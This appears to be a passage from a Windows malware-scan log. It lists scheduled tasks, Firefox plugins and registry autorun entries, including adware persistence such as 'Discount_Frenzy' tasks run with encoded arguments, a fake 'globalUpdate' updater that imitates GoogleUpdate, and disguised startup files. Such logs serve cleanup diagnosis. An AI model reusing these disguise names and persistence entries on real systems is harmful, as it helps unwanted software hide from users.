FUw7uJOzCh4KcsBzzVncM/HpHysDOqAyNbcFS0595vs6GMO+knNkKm9rooE7IkYcX/XcBvGme/ZlzSQrulasK4jTN4usTwclAJKGgloU2VA02Sbqtr3V8cVN37N9wo7ojxOQ3S4spLgBtvdFQAWqRt9V8iqR2zGsQKu7e5EMA437zE9BMhAnkzB1E9IX3k5vFASCgJ5EjmhZKWmEVw2JR1xU2ybU6/becBa8PPkkKNIzxrT35kH52ZV2Ak0a+7FYPuBw/9V22j5clwrPNmTbvNEZmsctWE9eQC/GNSWHbbzY0jADvnwbtAdFKhFqupon+5WZ49fJWlSePQWwz5EIzM2Sf5OKksRC20ckp7rDo/T9yizKa8YHlRrb02pfeWERvABODQaYn2w78h7plNS8zznTHxfVO1E3gp6Mnd2AVsRhu3KoiaWNlIlQesxWl54zIRYdQYlbQaI9LnFkqy3z1+YWRhEJ+23SWWCeM+iQ/V8fXP51+uBhbqxHtc0KzMsdSPdvUw+P1sJTc44zJI/YNx3IWBIsKCMDwmOdXLRmfLbL0jm2UQmopEEkYmFKGadyL9jK241Y2xK2BnLl5JNeXyRROSYVN1kDpQQl3rPzUWji22XiDBaRgFwSei+fkzWbhn1jQoG/ea9EzocYYQb2BB5XI8nVVB6osKdP+VYGXIYkAm8mU8XEefYdVd+s1WPwLpQ/Pqf5ucNfyO8IRX1T/7xXewY3Sz+FYzj2Mh44Rb0y+uXJQ+uwwXN+B+TPiXtHVC3xEqOc3GZ37Lb6IT0Z3MvwdQP57PUgKeX9PJIi55fj3hDhcpWhSaOFSp5tJSwBhY0kMUViz5SBwgmSEeTKcPfcHPo07ikdfBtqhb0WU3bwVQlVErHaMNU81PdAeSe6ey0QnOWau8gkQgtA/ZmBTDqlV0K+4/k1H+W/B6QmZK0QSG9zwBLQeozLsGw1fAdvQBKtSCDNmPqPyAr5rhUaYJ5w2bC6R4RRUMX7K1KT2Rwjd2oeYY5fFFuVHLBZAhHPeepvYfQNRwFTy1erIsf
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-5.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-5.exe /rawdata=phGOhdZwFahqjIGk2m13mlCS3XpiKy5LY3cO4uO0teaWsJOusi0LHgx8MsH3X1vvL/d1P5IUT4gL7Gyfpwc+Pyehq+gNU0IDQJksl+ecXlSzV4QP4XkAmlqgfXkjVhL6dzW8gUUlIFiRwHATla0UXANQp3ytOMWfanxgdsdOPvwdDRiZv7O9TjlYjNZSu4dRbCqgo2Krf4MJYoU8YXwYN7LEGzqHjz3ks7ng4Cj97NPMISKChjEIOPt04H4+6zfMCdwzI+aUjBg89IJdA1+Dd2N3jc+NTNQhpT8OYIb4bAc4UiUGUatKHDQIjgBUg1BeLw96eF+m4oVzF4FORUKLhWRiqT6MX+0N+xDBkP+9AFdrTV/zZzQaDZsrBMpj0lJkLQKN/4U7noMoe0FA982L0GJZMkBVHSApVcW27y6co4MW0uS3pjYMBqWWPZ+eKvv7Vdb1VWgmo7wawN+eijN9bByWHez7bpYdYWydJRF/947DICirbSs0Mtah7Y5vCbFvWHM/QVM+zX4kRNmBcvPmjfuvKAeE8xSyMRfXGkXl5fqddiBwaJejnJm4lFjQMKjFTN7NKrvqzMrvFIgRQT0K3OUwrNpn0FILjt2kybTimI2FYlFVBWVcEYrMXoeLIdzBkHY+uw67ZxIUQQcJXnxb8u1vFWBw0U8y4bkeYTSsHuB9Xkg5eWCjmytmAp984kWMRM0an99XMSfh7L/dl+sH1B6dvEd+TyLaBn5a2grYJlTEBM56S+X/d2vBu9rjShuZ7mDGXiyHo1d7IwHP9HIXnS+6dp9FFU4oSlkuIXYjD+aYwpv4a2ZrV1pglGxcIevef+A0DVcrgF+Q/rnWT1Us4FGZRZyecK+0HxPSDO3ze2iW0jGqlbkvzq8aBsNpbKuhs9Ic+iZAVZ431jeGI+BJ4H8TUAtWJHz9aR0WpmdbyT/w58jOZ81HEWL70G8lEWKLU21D0zW4aMlnkO2rQ0AYi7GAIhfXUraeRXspdmshF+dA8LZW+KJTyVKbjiIQtwz2
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-5_user.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-5.exe /rawdata=phGOhdZwFahqjIGk2m13mlCS3XpiKy5LY3cO4uO0teaWsJOusi0LHgx8MsH3X1vvL/d1P5IUT4gL7Gyfpwc+Pyehq+gNU0IDQJksl+ecXlSzV4QP4XkAmlqgfXkjVhL6dzW8gUUlIFiRwHATla0UXANQp3ytOMWfanxgdsdOPvwdDRiZv7O9TjlYjNZSu4dRbCqgo2Krf4MJYoU8YXwYN7LEGzqHjz3ks7ng4Cj97NPMISKChjEIOPt04H4+6zfMCdwzI+aUjBg89IJdA1+Dd2N3jc+NTNQhpT8OYIb4bAc4UiUGUatKHDQIjgBUg1BeLw96eF+m4oVzF4FORUKLhWRiqT6MX+0N+xDBkP+9AFdrTV/zZzQaDZsrBMpj0lJkLQKN/4U7noMoe0FA982L0GJZMkBVHSApVcW27y6co4MW0uS3pjYMBqWWPZ+eKvv7Vdb1VWgmo7wawN+eijN9bByWHez7bpYdYWydJRF/947DICirbSs0Mtah7Y5vCbFvWHM/QVM+zX4kRNmBcvPmjfuvKAeE8xSyMRfXGkXl5fqddiBwaJejnJm4lFjQMKjFTN7NKrvqzMrvFIgRQT0K3OUwrNpn0FILjt2kybTimI2FYlFVBWVcEYrMXoeLIdzBkHY+uw67ZxIUQQcJXnxb8u1vFWBw0U8y4bkeYTSsHuB9Xkg5eWCjmytmAp984kWMRM0an99XMSfh7L/dl+sH1B6dvEd+TyLaBn5a2grYJlTEBM56S+X/d2vBu9rjShuZ7mDGXiyHo1d7IwHP9HIXnS+6dp9FFU4oSlkuIXYjD+aYwpv4a2ZrV1pglGxcIevef+A0DVcrgF+Q/rnWT1Us4KsDtRn9DHV88h1Qim4kYymwZHxCGnRkm60krXhHW0/dcEB8QH1TEKHmOaRRUiawVCs7oNz6A5Pzs0jfeufy6TMKKQ3nKj5EftqCRH8RrDwOZRFYmtxr7W/SctRgq0bpSXQqLSUZ24Rls7r8dCpkN2ht6RurvS+V/OgcjL3cgCAJ
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-6.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-6.exe /rawdata=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
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-7.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-7.exe /rawdata=iHroEeggc7sQpoMmUkNMoq62SObr4DWbeslCJeX4gd6pJvTq2avv+EMZw0XOnmjfWeyThtpkGnZei+uDO0xkTF7He03G2LAdYAKmu9oCfRTqlyjuqsiJvyFAf8uhAJUvpWUuH7zVqTFAjsJbZDtSFUKdKrL8gJ2L1emEcWDJzteSGm1kViNiJcun05iLZGihHdJgFRGl9q9VSLVEWivzDxIEADL3QTnh+QMvAsczJ+G72qWqZiZJc9GcUhdjBiqKKZ4Sd1Wo70BhFa0oA+Qn5Tc4T6cbNqx+nTKQhIqKQkMGRDBSnOyPjgUNK9wXqNzzyqRhu9ganacIJ5N8om/xHhj/4ufKZd+wkydo3ZqSPym71yTdEiYDwfyUHUztJ8bIiVj50A5LqYDibQv2W9ltRxQ/I80y9bfOL63F7Xx0uDNG9G8m/QiKWZq4j0mQ3xcwgDwdTVoQsF07RcFXQOyUeEQHlbtUriVTnWXSxLDiDaN6hmWBMKEK4Nyaybo8ck1gp8LY1LlKJ/WuSt8l/80ZwkBa0k5euZyrNJGsm8lASFdL8FVShGLBeMz5kaTbJAa2piiR3F1DYIwSyJWINXE2XLLI9VJHmCZUvwWyCgLmUzVglyqVHQnrpGkphi4ZocJicKK5yTOdvDoUqrr3I8VU1OppbgNKrGYQy0uxoQgf/JIwKaekvXUxGY9NHVZBsGsG+kSF5tQ7ERPZVPJlXmxLsWLXv5KW1t4WA61NujFOBJvwunvd/4adsAYFoRfM+liU+ZwwhrI68ldOUythJqyELoMe7I5XQ6bl5bWrDA77ClWEz+cG8rkq22oqV+zJ6mGUoQfgfaTrZtXrVQ3gxzjI/V0Mjt4aOHNUiqiUdQ2mRXDkCd/OdakBRUdqd96yTu4cUopSzKARYUbDmjsbKHFebfNO1vPL2dL04BPiESBDeBCVt1w2osmd2UBwENZjRON5Ucl5BDDw1o0ccL7AgH9cMX4oz6D7t/ywhorP1LA2tKs7UvIKMXfOvZGVypccgptGXzI6O79cPOIVUWJ0XMUIhxnU8auTd7WXqnwCj6/+CQIQ9VUdbQHiv58LMr1eTTdxLdQbCKZflssnXhGw4Z008oxDZWN9d8502htCgt7eM0ZzMQLw68RVRUPhYHQMhJXpQbCBT/klWCGmiKm1XonbYzsQIbrYEtVxc3XkpB5sjm5Tm1YCZH+ty4G5rRppTTVR/PSUvD6SbRHzflAMlovUVSxqcl+d8zwXsc4w8yLSlnUmejlqaQB71CCju11mluOF8P77R/n4wpDPhjWQWrjTcLJK/jZXF1JuYQieR4ehRFlQd9zM7DSdI7M1YKGG1Kk91fafYckBO1DH2VB6Iu6nPnfHR6XVS+xLPD37yi6zETdRG2HTiSa5+E3GmvabdJg+6IDSdWqhmZ8ltfxOIrtwPG/vpZ8G09R16z46d62sOVP44Fyr+JhremLFird9CUxUuFDrH+c1ue8g46Da51NId1y1lAGEnOac/lMnlVkCC05sJKKBfkqe3yAwbiMxUOLnViNLwNQ6IaHh5O6p7G+qhMMtSJmD/dDYQrhI980iSybMhgC9uzfAK1yi48GZTG56YuBWvPOpPLLPULLC+pvr9FhFzkPSbRZmbkTcsQsEiCJX5UPj4/4vVOZNJap4I+n2EgqIFiUxcWBk9zMopqG3SYRwM3/iN7L8eUdLV3ttlL2w4HZKIeN9I31TdpFKF99zAvNsTDMRiZoY1U4m0CuHLrnhIq2HD+rmZ0/29j3YzCRbSssdUyI7MkZoVU/c3n8NjYqYMRtcnTm2/fmxINoPtOquoS5X7SkPdqqc3+NhN+mnXv1FJw5ZWEegshuoQUJRRhvFGqPhLYiR4IrmlnO9fSh59keAq4p7jZG4dnfDMZ7VxgwDfiCSZUA+IHgWcjboCdZsRtxB/jps3kF2SX+SOY7oNKKTDjU2CJsRg2mSPPjZjGDf3+zXBSs0y9qYmYuQNeRNyNrX2NpA6pUJWySQbrqBFv3RN57EDpO8TA4OK88esORAY7VPLM5uJ78i4NanahSX8rMSdi5hKX1hTCs59Q+dxr/ckxxH5vrxfKiLT6D4bA9Pw2bN7y5O312Lrm+OSHY8ruJp/WVtKDxHh2ACZOii3SUqLq4UTHatkFbqjpxKp/T14K6L0oGiOBcM+/4XWiCKPPOXyDesJiK6x9d7cfUW++rAOnl6tTAyUz0BLGALwlre8XaMR+7M8Qv7/gylIEVwaiKqyzpdTMFGjp179LSb2XoTwu9UOGW1O8YFOM7/thFB3NgVlB6Y/RKY6S/mTQ5e2cS7mmE1ZnbNLp2I63/8uxumuKqI8/vURQ5zZ0IrrG065/jx2svnRssT5w3gNf6EYfT7ohQwWAjIRWoVMbtaTr0qPKDscGPCMmUWp0UE2L0XRufb2CMBsMvNQRgWR3Ai8c0DqzXtgVUYzpNIsXjymeTVLY2oAAbxCN0TLtMDGZ1VhbVQkIxO8bubd43UPDlui4vDjnXaIdvWM9HTECeoJM2nBO3Bb7TVldVDw/r1ELHC75Js8ZJiAv8vhMuM
C:\Windows\tasks\globalUpdateUpdateTaskMachineCore.job - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe /c
C:\Windows\tasks\globalUpdateUpdateTaskMachineUA.job - C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe /ua /installsource scheduler
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\Amd\AppData\Roaming\Mozilla\Firefox\Profiles\3lplb9l2.default

prefs.js - "browser.search.useDBForOrder" - true
prefs.js - "browser.startup.homepage" - "http://www.seznam.cz/"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 17.0.0.169 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@alawar.com/npapi]
"Description"=
"Path"=C:\Windows\npapi.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.40.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files (x86)\Java\jre1.8.0_40\bin\dtplugin\npDeployJava1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.40.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description"=globalUpdate Update
"Path"=C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description"=globalUpdate Update
"Path"=C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 17.0.0.169 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL


C:\Users\Amd\AppData\Roaming\Mozilla\Firefox\Profiles\3lplb9l2.default\searchplugins\
mystartsearch.xml

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~1\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~1\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSC"=C:\Program Files\Microsoft Security Client\msseces.exe [2015-01-30 1332296]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"=C:\Program Files\CCleaner\CCleaner64.exe [2014-12-12 7394584]
"Zoner Photo Studio Autoupdate"=C:\PROGRAM FILES\ZONER\PHOTO STUDIO 15\Program32\ZPSTRAY.EXE [2013-02-18 774168]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19 1022152]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ApnTBMon]
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [2013-04-21 59720]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BCSSync]
C:\Program Files\Microsoft Office\Office14\BCSSync.exe [2012-11-05 108144]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}]
C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [2007-06-27 152872]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CCleaner Monitoring]
C:\Program Files\CCleaner\CCleaner64.exe [2014-12-12 7394584]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.autoupdate]
C:\Users\Amd\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\cz.seznam.software.szndesktop]
C:\Users\Amd\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2013-04-12 92664]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools Lite]
C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [2014-03-04 3696912]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GarminExpressTrayApp]
C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
C:\Program Files (x86)\QuickTime\QTTask.exe [2013-05-01 421888]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RGSC]
C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe [2008-11-14 305064]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RTHDVCPL]
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2013-06-27 7191768]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RUSB3MON]
C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\rusb3mon.exe [2011-09-20 115048]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\seznam-listicka-distribuce]
C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Zoner Photo Studio Autoupdate]
C:\PROGRAM FILES\ZONER\PHOTO STUDIO 15\Program32\ZPSTRAY.EXE [2013-02-18 774168]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk]
C:\PROGRA~1\MCAFEE~1\385C9A~1.150\SSSCHE~1.EXE [2014-04-09 332016]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Amd^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Calvin Harris.lnk]
C:\PROGRA~3\{12742~1\CALVIN~1.EXE [2015-01-12 1212416]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Amd^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Landi 11.lnk]
C:\PROGRA~2\LANDI1~1\Landi11.exe [2012-03-31 2691072]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-09-11 766208]
"WindowsDriverScan86"=C:\Program Files (x86)\Adobe Arkalis\Arkalis86.lnk [2014-08-10 1501]
"WindowsDriverScan64"=C:\Program Files (x86)\Adobe Arkalis\Arkalis.lnk [2014-08-10 1419]

C:\Users\Amd\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
conhost32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=" "

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~1\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MsMpSvc]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
